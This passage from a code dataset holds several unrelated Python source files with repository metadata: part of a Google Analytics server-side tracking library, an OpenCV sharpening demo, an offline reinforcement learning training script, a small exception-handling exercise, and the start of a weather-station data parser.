self).build_parameters()\n\n tmppagepath = self.social_interaction.target\n if tmppagepath is None:\n tmppagepath = self.page.path\n\n params.utmsn = self.social_interaction.network\n params.utmsa = self.social_interaction.action\n params.utmsid = tmppagepath\n return params\n\n\nclass TransactionRequest(Request):\n def __init__(self, config, tracker, visitor, session, transaction):\n super(TransactionRequest, self).__init__(config, tracker,\n visitor, session)\n self.transaction = transaction\n\n def get_type(self):\n return TransactionRequest.TYPE_TRANSACTION\n\n def build_parameters(self):\n params = super(TransactionRequest, self).build_parameters()\n params.utmtid = self.transaction.order_id\n params.utmtst = self.transaction.affiliation\n params.utmtto = self.transaction.total\n params.utmttx = self.transaction.tax\n params.utmtsp = self.transaction.shipping\n params.utmtci = self.transaction.city\n params.utmtrg = self.transaction.state\n params.utmtco = self.transaction.country\n return params\n\n def build_visitor_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any visitor information for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n def build_custom_variable_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any custom variables for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n\nclass Config(object):\n '''\n Configurations for Google Analytics: Server Side\n\n Properties:\n error_severity -- How strict should errors get handled? After all,\n we do just do some tracking stuff here, and errors shouldn't\n break an application's functionality in production.\n RECOMMENDATION: Exceptions during deveopment, warnings in production.\n queue_requests -- Whether to just queue all requests on HttpRequest.fire()\n and actually send them on shutdown after all other tasks are done.\n This has two advantages:\n 1) It effectively doesn't affect app performance\n 2) It can e.g. handle custom variables that were set after scheduling a request\n fire_and_forget -- Whether to make asynchronous requests to GA without\n waiting for any response (speeds up doing requests).\n logging_callback -- Logging callback, registered via setLoggingCallback().\n Will be fired whenever a request gets sent out and receives the\n full HTTP request as the first and the full HTTP response\n (or null if the \"fireAndForget\" option or simulation mode are used) as the 2nd argument.\n request_timeout -- Seconds (float allowed) to wait until timeout when\n connecting to the Google analytics endpoint host.\n endpoint -- Google Analytics tracking request endpoint. Can be set to null to\n silently simulate (and log) requests without actually sending them.\n anonimize_ip_address -- Whether to anonymize IP addresses within Google Analytics\n by stripping the last IP address block, will be mapped to \"aip\" parameter.\n site_speed_sample_rate -- Defines a new sample set size (0-100) for\n Site Speed data collection. By default, a fixed 1% sampling of your site\n visitors make up the data pool from which the Site Speed metrics are derived.\n\n '''\n ERROR_SEVERITY_SILECE = 0\n ERROR_SEVERITY_PRINT = 1\n ERROR_SEVERITY_RAISE = 2\n\n def __init__(self):\n self.error_severity = Config.ERROR_SEVERITY_RAISE\n self.queue_requests = False\n # self.fire_and_forget = False # not supported as of now\n # self.logging_callback = False # not supported as of now\n self.request_timeout = 1\n self.endpoint = 'http://www.google-analytics.com/__utm.gif'\n self.anonimize_ip_address = False\n self.site_speed_sample_rate = 1\n\n def __setattr__(self, name, value):\n if name == 'site_speed_sample_rate':\n if value and (value < 0 or value > 100):\n raise ValueError('For consistency with ga.js, sample rates must be specified as a number between 0 and 100.')\n object.__setattr__(self, name, value)\n\n\nclass Parameters(object):\n '''\n This simple class is mainly meant to be a well-documented overview\n of all possible GA tracking parameters.\n\n http://code.google.com/apis/analytics/docs/tracking/gaTrackingTroubleshooting.html#gifParameters\n\n General Parameters:\n utmwv -- Google Analytics client version\n utmac -- Google Analytics account ID\n utmhn -- Host Name\n utmt -- Indicates the type of request, which is one of null (for page),\n \"event\", \"tran\", \"item\", \"social\", \"var\" (deprecated) or \"error\"\n (used by ga.js for internal client error logging).\n utms -- Contains the amount of requests done in this session. Added in ga.js v4.9.2.\n utmn -- Unique ID (random number) generated for each GIF request\n utmcc -- Contains all cookie values, see below\n utme -- Extensible Parameter, used for events and custom variables\n utmni -- Event \"non-interaction\" parameter. By default, the event hit will impact a visitor's bounce rate.\n By setting this parameter to 1, this event hit will not be used in bounce rate calculations.\n aip -- Whether to anonymize IP addresses within Google Analytics by stripping the last IP address block, either null or 1\n utmu -- Used for GA-internal statistical client function usage and error tracking,\n not implemented in php-ga as of now, but here for documentation completeness.\n http://glucik.blogspot.com/2011/02/utmu-google-analytics-request-parameter.html\n\n Page Parameters:\n utmp -- Page request URI\n utmdt -- Page title\n utmcs -- Charset encoding (default \"-\")\n utmr -- Referer URL (default \"-\" or \"0\" for internal purposes)\n\n Visitor Parameters:\n utmip -- IP Address of the end user, found in GA for Mobile examples, but sadly seems to be ignored in normal GA use\n utmul -- Visitor's locale string (all lower-case, country part optional)\n utmfl -- Visitor's Flash version (default \"-\")\n utmje -- Visitor's Java support, either 0 or 1 (default \"-\")\n utmsc -- Visitor's screen color depth\n utmsr -- Visitor's screen resolution\n _utma -- Visitor tracking cookie parameter.\n\n Session Parameters:\n utmhid -- Hit id for revenue per page tracking for AdSense, a random per-session ID\n _utmb -- Session timeout cookie parameter.\n _utmc -- Session tracking cookie parameter.\n utmipc -- Product Code. This is the sku code for a given product.\n utmipn -- Product Name\n utmipr -- Unit Price. Value is set to numbers only.\n utmiqt -- Unit Quantity.\n utmiva -- Variations on an item.\n utmtid -- Order ID.\n utmtst -- Affiliation\n utmtto -- Total Cost\n utmttx -- Tax Cost\n utmtsp -- Shipping Cost\n utmtci -- Billing City\n utmtrg -- Billing Region\n utmtco -- Billing Country\n\n Campaign Parameters:\n utmcn -- Starts a new campaign session. Either utmcn or utmcr is present on any given request,\n but never both at the same time. Changes the campaign tracking data;\n but does not start a new session. Either 1 or not set.\n Found in gaforflash but not in ga.js, so we do not use it,\n but it will stay here for documentation completeness.\n utmcr -- Indicates a repeat campaign visit. This is set when any subsequent clicks occur on the\n same link. Either utmcn or utmcr is present on any given request,\n but never both at the same time. Either 1 or not set.\n Found in gaforflash but not in ga.js, so we do not use it,\n but it will stay here for documentation completeness.\n utmcid -- Campaign ID, a.k.a. \"utm_id\" query parameter for ga.js\n utmcsr -- Source, a.k.a. \"utm_source\" query parameter for ga.js\n utmgclid -- Google AdWords Click ID, a.k.a. \"gclid\" query parameter for ga.js\n utmdclid -- Not known for sure, but expected to be a DoubleClick Ad Click ID.\n utmccn -- Name, a.k.a. \"utm_campaign\" query parameter for ga.js\n utmcmd -- Medium, a.k.a. \"utm_medium\" query parameter for ga.js\n utmctr -- Terms/Keywords, a.k.a. \"utm_term\" query parameter for ga.js\n utmcct -- Ad Content Description, a.k.a. \"utm_content\" query parameter for ga.js\n utmcvr -- Unknown so far. Found in ga.js.\n _utmz -- Campaign tracking cookie parameter.\n\n Social Tracking Parameters:\n utmsn -- The network on which the action occurs\n utmsa -- The type of action that happens\n utmsid -- The page URL from which the action occurred.\n\n Google Website Optimizer (GWO) parameters:\n _utmx -- Website Optimizer cookie parameter.\n\n Custom Variables parameters (deprecated):\n _utmv -- Deprecated custom variables cookie parameter.\n\n '''\n\n def __init__(self):\n # General Parameters\n self.utmwv = Tracker.VERSION\n self.utmac = ''\n self.utmhn = ''\n self.utmt = ''\n self.utms = ''\n self.utmn = ''\n self.utmcc = ''\n self.utme = ''\n self.utmni = ''\n self.aip = ''\n self.utmu = ''\n\n # Page Parameters\n self.utmp = ''\n self.utmdt = ''\n self.utmcs = '-'\n self.utmr = '-'\n\n # Visitor Parameters\n self.utmip = ''\n self.utmul = ''\n self.utmfl = '-'\n self.utmje = '-'\n self.utmsc = ''\n self.utmsr = ''\n '''\n Visitor tracking cookie __utma\n\n This cookie is typically written to the browser upon the first\n visit to your site from that web browser. If the cookie has been\n deleted by the browser operator, and the browser subsequently\n visits your site, a new __utma cookie is written with a different unique ID.\n\n This cookie is used to determine unique visitors to your site and\n it is updated with each page view. Additionally, this cookie is\n provided with a unique ID that Google Analytics uses to ensure both the\n validity and accessibility of the cookie as an extra security measure.\n\n Expiration: 2 years from set/update.\n Format: __utma=.....\n '''\n self._utma = ''\n\n # Session Parameters\n self.utmhid = ''\n '''\n Session timeout cookie parameter __utmb\n\n Will never be sent with requests, but stays here for documentation completeness.\n\n This cookie is used to establish and continue a user session with your site.\n When a user views a page on your site, the Google Analytics code attempts to update this cookie.\n If it does not find the cookie, a new one is written and a new session is established.\n\n Each time a user visits a different page on your site, this cookie is updated to expire in 30 minutes,\n thus continuing a single session for as long as user activity continues within 30-minute intervals.\n\n This cookie expires when a user pauses on a page on your site for longer than 30 minutes.\n You can modify the default length of a user session with the setSessionTimeout() method.\n\n Expiration: 30 minutes from set/update.\n\n Format: __utmb=...\n\n '''\n self._utmb = ''\n '''\n Session tracking cookie parameter __utmc\n\n Will never be sent with requests, but stays here for documentation completeness.\n\n This cookie operates in conjunction with the __utmb cookie to\n determine whether or not to establish a new session for the user.\n In particular, this cookie is not provided with an expiration date,\n so it expires when the user exits the browser.\n\n Should a user visit your site, exit the browser and then return to your website within 30 minutes,\n the absence of the __utmc cookie indicates that a new session needs to be established,\n despite the fact that the __utmb cookie has not yet expired.\n\n Expiration: Not set.\n\n Format: __utmc=\n\n '''\n self._utmc = ''\n self.utmipc = ''\n self.utmipn = ''\n self.utmipr = ''\n self.utmiqt = ''\n self.utmiva = ''\n self.utmtid = ''\n self.utmtst = ''\n self.utmtto = ''\n self.utmttx = ''\n self.utmtsp = ''\n self.utmtci = ''\n self.utmtrg = ''\n self.utmtco = ''\n\n # Campaign Parameters\n self.utmcn = ''\n self.utmcr = ''\n self.utmcid = ''\n self.utmcsr = ''\n self.utmgclid = ''\n self.utmdclid = ''\n self.utmccn = ''\n self.utmcmd = ''\n self.utmctr = ''\n self.utmcct = ''\n self.utmcvr = ''\n '''\n Campaign tracking cookie parameter.\n\n This cookie stores the type of referral used by the visitor to reach your site,\n whether via a direct method, a referring link, a website search, or a campaign such as an ad or an email link.\n\n It is used to calculate search engine traffic, ad campaigns and page navigation within your own site.\n The cookie is updated with each page view to your site.\n\n Expiration: 6 months from set/update.\n\n Format: __utmz=....\n\n '''\n self._utmz = ''\n\n # Social Tracking Parameters\n self.utmsn = ''\n self.utmsa = ''\n self.utmsid = ''\n\n # Google Website Optimizer (GWO) parameters\n '''\n Website Optimizer cookie parameter.\n\n This cookie is used by Website Optimizer and only set when Website\n Optimizer is used in combination with GA.\n See the Google Website Optimizer Help Center for details.\n\n Expiration: 2 years from set/update.\n '''\n self._utmx = ''\n\n # Custom Variables parameters (deprecated)\n '''\n Deprecated custom variables cookie parameter.\n\n This cookie parameter is no longer relevant as of migration from setVar() to\n setCustomVar() and hence not supported by this library,\n but will stay here for documentation completeness.\n\n The __utmv cookie passes the information provided via the setVar() method,\n which you use to create a custom user segment.\n\n Expiration: 2 years from set/update.\n\n Format: __utmv=.\n\n '''\n self._utmv = ''\n\n def get_parameters(self):\n '''\n Get all gif request parameters out of the class in a dict form.\n Attributes starting with _ are cookie names, so we dont need them.\n '''\n params = {}\n attribs = vars(self)\n for attr in attribs:\n if attr[0] != '_':\n val = getattr(self, attr)\n if val:\n params[attr] = val\n\n return params\n\n\nclass Tracker(object):\n '''\n Act like a Manager of all files\n\n Properties:\n account_id -- Google Analytics account ID, will be mapped to \"utmac\" parameter\n domain_name -- Host Name, will be mapped to \"utmhn\" parameter\n allow_hash -- Whether to generate a unique domain hash,\n default is true to be consistent with the GA Javascript Client\n custom_variables -- CustomVariable instances\n campaign -- Campaign instance\n '''\n\n '''\n Google Analytics client version on which this library is built upon,\n will be mapped to \"utmwv\" parameter.\n\n This doesn't necessarily mean that all features of the corresponding\n ga.js version are implemented but rather that the requests comply\n with these of ga.js.\n\n http://code.google.com/apis/analytics/docs/gaJS/changelog.html\n '''\n VERSION = '5.3.0'\n config = Config()\n\n def __init__(self, account_id='', domain_name='', conf=None):\n self.account_id = account_id\n self.domain_name = domain_name\n self.allow_hash = True\n self.custom_variables = {}\n self.campaign = None\n if isinstance(conf, Config):\n Tracker.config = conf\n\n def __setattr__(self, name, value):\n if name == 'account_id':\n if value and not utils.is_valid_google_account(value):\n raise ValueError(\n 'Given Google Analytics account ID is not valid')\n\n elif name == 'campaign':\n if isinstance(value, Campaign):\n value.validate()\n else:\n value = None\n\n object.__setattr__(self, name, value)\n\n def add_custom_variable(self, custom_var):\n '''\n Equivalent of _setCustomVar() in GA Javascript client\n http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html\n '''\n if not isinstance(custom_var, CustomVariable):\n return\n\n custom_var.validate()\n index = custom_var.index\n self.custom_variables[index] = custom_var\n\n def remove_custom_variable(self, index):\n '''Equivalent of _deleteCustomVar() in GA Javascript client.'''\n if index in self.custom_variables:\n del self.custom_variables[index]\n\n def track_pageview(self, page, session, visitor):\n '''Equivalent of _trackPageview() in GA Javascript client.'''\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'page': page,\n }\n request = PageViewRequest(**params)\n request.fire()\n\n def track_event(self, event, session, visitor):\n '''Equivalent of _trackEvent() in GA Javascript client.'''\n event.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'event': event,\n }\n request = EventRequest(**params)\n request.fire()\n\n def track_transaction(self, transaction, session, visitor):\n '''Combines _addTrans(), _addItem() (indirectly) and _trackTrans() of GA Javascript client.'''\n transaction.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'transaction': transaction,\n }\n request = TransactionRequest(**params)\n request.fire()\n\n for item in transaction.items:\n item.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'item': item,\n }\n request = ItemRequest(**params)\n request.fire()\n\n def track_social(self, social_interaction, page, session, visitor):\n '''Equivalent of _trackSocial() in GA Javascript client.'''\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'social_interaction': social_interaction,\n 'page': page,\n }\n request = SocialInteractionRequest(**params)\n request.fire()\n\n\nclass X10(object):\n __KEY = 'k'\n __VALUE = 'v'\n __DELIM_BEGIN = '('\n __DELIM_END = ')'\n __DELIM_SET = '*'\n __DELIM_NUM_VALUE = '!'\n __ESCAPE_CHAR_MAP = {\n \"'\": \"'0\",\n ')': \"'1\",\n '*': \"'2\",\n '!': \"'3\",\n }\n __MINIMUM = 1\n\n OBJECT_KEY_NUM = 1\n TYPE_KEY_NUM = 2\n LABEL_KEY_NUM = 3\n VALUE_VALUE_NUM = 1\n\n def __init__(self):\n self.project_data = {}\n\n def has_project(self, project_id):\n return project_id in self.project_data\n\n def set_key(self, project_id, num, value):\n self.__set_internal(project_id, X10.__KEY, num, value)\n\n def get_key(self, project_id, num):\n return self.__get_internal(project_id, X10.__KEY, num)\n\n def clear_key(self, project_id):\n self.__clear_internal(project_id, X10.__KEY)\n\n def set_value(self, project_id, num, value):\n self.__set_internal(project_id, X10.__VALUE, num, value)\n\n def get_value(self, project_id, num):\n return self.__get_internal(project_id, X10.__VALUE, num)\n\n def clear_value(self, project_id):\n self.__clear_internal(project_id, X10.__VALUE)\n\n def __set_internal(self, project_id, _type, num, value):\n '''Shared internal implementation for setting an X10 data type.'''\n if project_id not in self.project_data:\n self.project_data[project_id] = {}\n\n if _type not in self.project_data[project_id]:\n self.project_data[project_id][_type] = {}\n\n self.project_data[project_id][_type][num] = value\n\n def __get_internal(self, project_id, _type, num):\n ''' Shared internal implementation for getting an X10 data type.'''\n if num in self.project_data.get(project_id, {}).get(_type, {}):\n return self.project_data[project_id][_type][num]\n return None\n\n def __clear_internal(self, project_id, _type):\n '''\n Shared internal implementation for clearing all X10 data\n of a type from a certain project.\n '''\n if project_id in self.project_data and _type in self.project_data[project_id]:\n del self.project_data[project_id][_type]\n\n def __escape_extensible_value(self, value):\n '''Escape X10 string values to remove ambiguity for special characters.'''\n def _translate(char):\n try:\n return self.__ESCAPE_CHAR_MAP[char]\n except KeyError:\n return char\n\n return ''.join(map(_translate, str(value)))\n\n def __render_data_type(self, data):\n '''Given a data array for a certain type, render its string encoding.'''\n result = []\n last_indx = 0\n\n for indx, entry in sorted(data.items()):\n if entry:\n tmpstr = ''\n\n # Check if we need to append the number. If the last number was\n # outputted, or if this is the assumed minimum, then we don't.\n if indx != X10.__MINIMUM and indx - 1 != last_indx:\n tmpstr = '%s%s%s' % (tmpstr, indx, X10.__DELIM_NUM_VALUE)\n\n tmpstr = '%s%s' % (\n tmpstr, self.__escape_extensible_value(entry))\n result.append(tmpstr)\n\n last_indx = indx\n\n return \"%s%s%s\" % (X10.__DELIM_BEGIN, X10.__DELIM_SET.join(result), X10.__DELIM_END)\n\n def __render_project(self, project):\n '''Given a project array, render its string encoding.'''\n result = ''\n need_type_qualifier = False\n\n for val in X10.__KEY, X10.__VALUE:\n if val in project:\n data = project[val]\n if need_type_qualifier:\n result = '%s%s' % (result, val)\n\n result = '%s%s' % (result, self.__render_data_type(data))\n need_type_qualifier = False\n else:\n need_type_qualifier = True\n\n return result\n\n def render_url_string(self):\n result = ''\n for project_id, project in self.project_data.iteritems():\n result = '%s%s%s' % (\n result, project_id, self.__render_project(project))\n\n return result\n","repo_name":"steeve/xbmctorrent","sub_path":"resources/site-packages/pyga/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":37602,"program_lang":"python","lang":"en","doc_type":"code","stars":387,"dataset":"github-code","pt":"86"} +{"seq_id":"26600798976","text":"# Import Needed Packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport cv2\n\n\n# Read In Image\nimage = cv2.imread('../data/Lena.png')\n\n# Create An 11x11 Sharpening Kernel\nkSize = 11\nalpha = 2\n\nkernel = cv2.getGaussianKernel(kSize,0)\nkernel = -alpha * kernel @ kernel.T\nkernel[kSize//2, kSize//2] += 1 + alpha\n\n# Filter Image Using Created Kernel\nfiltered = cv2.filter2D(image, -1, kernel)\n\n# Display Results\nplt.figure(figsize=(8,4))\nplt.subplot(121)\nplt.axis('off')\nplt.title('Image')\nplt.imshow(image[:,:,[2,1,0]])\nplt.subplot(122)\nplt.axis('off')\nplt.title('Filtered')\nplt.imshow(filtered[:,:,[2,1,0]])\nplt.tight_layout(True)\nplt.show()","repo_name":"FadedIllusions/CVPyCookbook","sub_path":"Chapter_002/024_creating_your_own_filter.py","file_name":"024_creating_your_own_filter.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44015485009","text":"import numpy as np\nfrom numpy.lib.utils import info\nimport torch\nimport gym\nimport argparse\nimport os\n\nfrom torch.nn.functional import threshold\nimport d4rl\nfrom d4rl.offline_env import OfflineEnv\nimport utils\nimport TD3\nfrom episodic_memory_tbp import EpisodicMemoryTBP\nfrom torch.utils.tensorboard import SummaryWriter\nimport time\n\ndef reward2return(rewards, gamma=0.99):\n # covert reward to return\n returns = []\n Rtn = 0\n for r in reversed(rewards):\n Rtn = r + gamma * Rtn\n returns.append(Rtn)\n return list(reversed(returns))\n\n# Runs policy for X episodes and returns average reward\n# A fixed seed is used for the eval environment\ndef eval_policy(policy, env_name, seed, eval_episodes=10):\n\teval_env = gym.make(env_name)\n\teval_env.seed(seed + 100)\n\tavg_reward = 0.\n\tepisode_returns = []\n\teval_qs = []\n\tEVAl_MEAN = 0\n\tEVAL_ABS = 0\n\tfor _ in range(eval_episodes):\n\t\tstate, done = eval_env.reset(), False\n\t\twhile not done:\n\t\t\taction = policy.select_action(np.array(state), True)\n\t\t\tstate, reward, done, info = eval_env.step(action)\n\t\t\tavg_reward += reward\n\t\t\tepisode_returns.append(reward)\n\t\t\teval_q = policy.eval_state_action(state, action)\n\t\t\teval_qs.append(np.mean(eval_q))\n\t\tepisode_returns = reward2return(episode_returns)\n\t\tEVAl_MEAN += np.mean([x - y for x, y in zip(eval_qs, episode_returns)])\n\t\tEVAL_ABS += np.mean([abs(x - y) for x, y in zip(eval_qs, episode_returns)])\n\t\teval_qs = []\n\t\tepisode_returns = []\t\n\n\tavg_reward /= eval_episodes\n\tEVAl_MEAN /= eval_episodes\n\tEVAL_ABS /= eval_episodes\n\n\tprint(\"---------------------------------------\")\n\tprint(f\"Evaluation over {eval_episodes} episodes: {avg_reward:.3f} env: {str(env_name)}\")\n\tprint(\"---------------------------------------\")\n\treturn avg_reward, EVAl_MEAN, EVAL_ABS\n\nif __name__ == \"__main__\":\n\t\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--policy\", default=\"TD3\") # Policy name (TD3, DDPG or OurDDPG)\n\tparser.add_argument(\"--env\", default=\"pen-human-v0\") # OpenAI gym environment name\n\tparser.add_argument(\"--seed\", default=100, type=int) # Sets Gym, PyTorch and Numpy seeds\n\tparser.add_argument(\"--start_timesteps\", default=25e3, type=int)# Time steps initial random policy is used 25e3\n\tparser.add_argument(\"--eval_freq\", default=1e2, type=int) # How often (time steps) we evaluate\n\tparser.add_argument(\"--max_timesteps\", default=1e6, type=int) # Max time steps to run environment\n\tparser.add_argument(\"--expl_noise\", default=0.1) # Std of Gaussian exploration noise\n\tparser.add_argument(\"--batch_size\", default=128, type=int) # Batch size for both actor and critic\n\tparser.add_argument(\"--discount\", default=0.99) # Discount factor\n\tparser.add_argument(\"--tau\", default=0.005) # Target network update rate\n\tparser.add_argument(\"--policy_noise\", default=0.2) # Noise added to target policy during critic update\n\tparser.add_argument(\"--noise_clip\", default=0.5) # Range to clip target policy noise\n\tparser.add_argument(\"--policy_freq\", default=2, type=int) # Frequency of delayed policy updates\n\tparser.add_argument(\"--save_model\", action=\"store_true\") # Save model and optimizer parameters\n\tparser.add_argument(\"--load_model\", default=\"\") # Model load file name, \"\" doesn't load, \"default\" uses file_name\n\targs = parser.parse_args()\n\n\tfile_name = f\"{args.policy}_{args.env}_{args.seed}\"\n\tprint(\"---------------------------------------\")\n\tprint(f\"Policy: {args.policy}, Env: {args.env}, Seed: {args.seed}\")\n\tprint(\"---------------------------------------\")\n\n\tif not os.path.exists(\"./results\"):\n\t\tos.makedirs(\"./results\")\n\n\tif args.save_model and not os.path.exists(\"./models\"):\n\t\tos.makedirs(\"./models\")\n\n\tenv = gym.make(args.env)\n\n\t# Set seeds\n\tenv.seed(args.seed)\n\tenv.action_space.seed(args.seed)\n\ttorch.manual_seed(args.seed)\n\tnp.random.seed(args.seed)\n\t\n\tstate_dim_ = env.observation_space.shape[0]\n\taction_dim = env.action_space.shape[0] \n\tmax_action = float(env.action_space.high[0])\n\n\tkwargs = {\n\t\t\"state_dim\": state_dim_,\n\t\t\"action_dim\": action_dim,\n\t\t\"max_action\": max_action,\n\t\t\"discount\": args.discount,\n\t\t\"tau\": args.tau,\n\t}\n\n\t# Initialize policy\n\tif args.policy == \"TD3\":\n\t\t# Target policy smoothing is scaled wrt the action scale\n\t\tkwargs[\"policy_noise\"] = args.policy_noise * max_action\n\t\tkwargs[\"noise_clip\"] = args.noise_clip * max_action\n\t\tkwargs[\"policy_freq\"] = args.policy_freq\n\t\tpolicy = TD3.TD3(**kwargs)\n\n\tbuffer_size = len(env.get_dataset()['observations'])\n\t# -----------------------------parameter----------------------------\n\ttrain_freq = 100\n\tgradient_steps = 200\n\tslope = 0.3\n\tmax_step = 1000\n\tpolicy_beta = 100\n\tthreshold_vem = -1000\n\teta = 0.1\n\t# -----------------------------parameter----------------------------\n\tnum_timesteps = 0\n\tbeta = -1\n\n\tmemory = EpisodicMemoryTBP(buffer_size, state_dim=1,\n\t\t\t\t\t\t\t\tobs_space=env.observation_space,\n\t\t\t\t\t\t\t\taction_shape=env.action_space,\n\t\t\t\t\t\t\t\tgamma=args.discount,\n\t\t\t\t\t\t\t\tmax_step=max_step,\n\t\t\t\t\t\t\t\tpolicy=policy,\n\t\t\t\t\t\t\t\teta=eta,\n\t\t\t\t\t\t\t\tpolicy_noise=kwargs[\"policy_noise\"], noise_clip=kwargs[\"noise_clip\"], max_action=kwargs[\"max_action\"])\n\n\t# -------------------------------load dataset------------------------------------\n\tdataset = d4rl.sequence_dataset(env)\n\treward_l = []\n\tfor seq in dataset:\n\t\tobservations, actions, dones, rewards, truly_dones = seq['observations'], seq['actions'], seq[\n\t\t\t'timeouts'], seq['rewards'], seq['terminals']\n\t\tif dones[-1] == True:\n\t\t\ttruly_dones[-1] = True\n\t\telif truly_dones[-1] == True:\n\t\t\tobservations = np.vstack((observations, observations[-1].reshape(1, -1)))\n\t\t\tactions = np.vstack((actions, actions[-1].reshape(1, -1)))\n\t\t\tdones = np.hstack((dones, np.array([True])))\n\t\t\ttruly_dones = np.hstack((truly_dones, np.array([True])))\n\t\t\trewards = np.hstack((rewards, rewards[-1].reshape(-1,)))\n\t\treward_l.append(rewards.sum())\n\t\ttrajectory = [(obs, action, 0, 0, reward, truly_done, done) for\n\t\t\t\t\t\tobs, action, reward, truly_done, done in\n\t\t\t\t\t\tzip(observations, actions, rewards, truly_dones, dones)]\n\t\tmemory.update_sequence_with_qs(trajectory)\n\tprint('---------------------- done ----------------------------')\n\t# --------------------------------------------------------------------------------\n\tpolicy_name = 'VEM_softmax'\n\twriter = SummaryWriter(f\"results/{str(policy_name) + '_' + str(args.env) + '_' + str(args.seed)}/\")\n\ttorch.set_num_threads(10)\n\tstart_time = time.time()\n\t# -----------------------------update V------------------------------------\n\tfor t in range(int(args.max_timesteps)):\n\t\tif t % train_freq == 0:\n\t\t\tmemory.update_memory(0, beta=beta)\n\t\t\tprint('update_t: ', t, 'time: ', int((time.time() - start_time)), str(args.env), str(slope), str(max_step), str(policy_beta), str(args.seed))\n\t\t\tstart_time = time.time()\n\t\t\tfor grad_step in range(gradient_steps):\n\t\t\t\treturn_info = policy.train_critic(memory, args.batch_size, gradient_steps, slope, policy_beta)\n\t\tif (t + 1) % args.eval_freq == 0:\n\t\t\twriter.add_scalar('V_max', return_info['Q_max'], t)\n\t\t\twriter.add_scalar('V_min', return_info['Q_min'], t)\n\t\t\twriter.add_scalar('V_mean', return_info['Q_mean'], t)\n\t\t\twriter.add_scalar('R_max', return_info['R_max'], t)\n\t\t\twriter.add_scalar('R_min', return_info['R_min'], t)\n\t\t\twriter.add_scalar('R_mean', return_info['R_mean'], t)\n\t\t\twriter.add_scalar('v_loss', return_info['q_loss'], t)\n\n\t\tif (t + 1) % (args.eval_freq * 5) == 0: # args.eval_freq * 5\n\t\t\tpolicy.save(f\"./pytorch_models/{str(args.env) + '_' + str(args.seed)}\")\n\n\t# -----------------------------update A------------------------------------\n\tpolicy.load(f\"./pytorch_models/{str(args.env) + '_' + str(args.seed)}\")\n\tmemory.update_memory(0, beta=beta)\n\tfor t in range(int(args.max_timesteps)): \n\t\tif t % train_freq == 0:\n\t\t\tfor grad_step in range(gradient_steps):\n\t\t\t\treturn_info = policy.train_actor(memory, args.batch_size, gradient_steps, slope, policy_beta, threshold_vem, args.env)\n\t\tif (t + 1) % args.eval_freq == 0:\n\t\t\teval_reward, eval_mean, eval_abs = eval_policy(policy, args.env, args.seed)\n\t\t\twriter.add_scalar('reward', eval_reward, t)\n\t\t\twriter.add_scalar('V-R_mean', eval_mean, t)\n\t\t\twriter.add_scalar('V-R_abs', eval_abs, t)\n\t\t\ttry:\n\t\t\t\twriter.add_scalar('actor_loss', return_info['actor_loss'], t)\n\t\t\t\twriter.add_scalar('logp', return_info['logp'], t)\n\t\t\texcept:\n\t\t\t\tpass","repo_name":"YiqinYang/VEM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"86"} +{"seq_id":"26581339572","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n try:\n count = 0\n count2 = 0\n for i in my_list:\n count += 1\n if x >= count:\n raise IndexError\n except IndexError:\n for j in range(count):\n print(my_list[j], end=\"\")\n count2 += 1\n print(end=\"\\n\")\n else:\n for j in range(x):\n print(my_list[j], end=\"\")\n count2 += 1\n print(end=\"\\n\")\n return count2\n","repo_name":"Nataly-Aketch/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32835613674","text":"#Michael Johnston\n#Surface Data Analysis\n\nexecfile('/home/xb899100/bin/projectFun.py')\n\nsfcData = {'DIR' : [],\n 'U' : [],\n 'temperature' : [],\n 'dew' : []}\ndateTimes = []\nwith open('/home/xb899100/data/Station/SurfaceData.txt') as txtFile:\n next(txtFile)\n next(txtFile)\n for line in txtFile:\n myLine = line.split()\n DIR = int(myLine[5].split(',')[1])\n U = float(myLine[6].split(',')[0])\n temp = myLine[7].split(',')[0]\n dew = myLine[8].split(',')[0]\n \n date = myLine[4].split(',')[3]\n hour = myLine[4].split(',')[4][0:2]\n minute = myLine[4].split(',')[4][2:5]\n \n if hour in ['08', '09', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23']:\n if minute == '00':\n time = hour + ':' + minute\n if U < 50 and DIR < 361 and len(temp) > 0 and len(dew) > 0 and temp < '999.0' and dew < '999.0':\n sfcData['DIR'].append(DIR)\n sfcData['U'].append(U)\n sfcData['temperature'].append(float(temp))\n sfcData['dew'].append(float(dew))\n dateTimes.append(date + ' ' + time)\n elif minute == '55':\n hour = str(int(hour) + 1)\n if len(hour) < 2:\n hour = '0'+hour\n time = hour + ':' + '00'\n if U < 50 and DIR < 361 and len(temp) > 0 and len(dew) > 0 and temp < '999.0' and dew < '999.0':\n sfcData['DIR'].append(DIR)\n sfcData['U'].append(U)\n sfcData['temperature'].append(float(temp))\n sfcData['dew'].append(float(dew))\n dateTimes.append(date + ' ' + time)\n\nmyBins1 = intoBins(np.array(sfcData['DIR']), myres)\nmyBins = []\nfor mydate in visdates:\n #puts the date of the satellite image into the format of the surface data\n date = str(mydate.date()).split('-')\n date = date[0] + date[1] + date[2]\n #round the time of the satellite image to the nearest hour\n time = 